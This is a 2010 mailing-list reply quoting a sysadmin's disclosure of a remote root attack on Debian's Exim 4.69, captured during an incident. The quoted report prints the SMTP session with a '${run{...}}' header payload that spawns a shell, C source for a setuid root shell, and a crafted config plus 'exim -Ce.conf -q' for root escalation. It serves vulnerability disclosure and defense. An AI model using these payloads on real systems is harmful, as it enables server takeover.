Hi Sergey, hi list,
On 07.12.2010 22:59, Sergey Kononenko wrote:
> Hi,
>
> While investigating security break in the network of my company, I've
> captured (by tcpdump) sequence of successful remote root attack through
> Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
> didn't find email of current maintainer of Exim, so I've decided to
> write to this mailing lists. I don't want to publish all details of
> attack before developers can investigate and fix vulnerability.
> So I ask Exim maintainers to contact me and I will send them complete
> captured sequence of attack.
I can fully understand why you do not want to publish details of the
attack and support it too. But maybe you could publish extracts from the
logs which might indicate the attack? That way, administrators (like me)
might have a chance to check if their systems are attacked already.
> Here I can put brief sequence of attack:
>
> EHLO mail.domain.com
> MAIL FROM: <orderruc0e@???>
> RCPT TO: <postmaster@???>
> DATA
> MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
> ....
> MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
> HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
> ..........
> about 700000 the same strings
> ..........
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
> MAILbombMAILb
> .
> MAIL FROM: <orderruc0e@???>
> RCPT TO: <postmaster@???>
>
> after that attacker gets shell with id of user Debian-exim and cwd
> in /var/spool/exim4
> then it put file there file setuid with trivial execution of root shell:
> int main(int argc, char *argv[])
> {
> setuid(0);
> setgid(0);
> setgroups(0, NULL);
> execl("/bin/sh", "sh", NULL);
> }
>
> and create another file e.conf with following content:
> spool_directory = ${run{/bin/chown
> root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}
>
> the he runs:
> exim -Ce.conf -q
>
> and gets suid bit on /var/spool/exim4/setuid
> everything else is trivial.
>
> I haven't reproduced remote part of attack, but escalation from Debian-exim to
> root works also at exim4-daemon-light 4.72-2 from Debian Squeeze.
>
So long,
--
Patrick Cernko |
mailto:pcernko@mpi-sws.org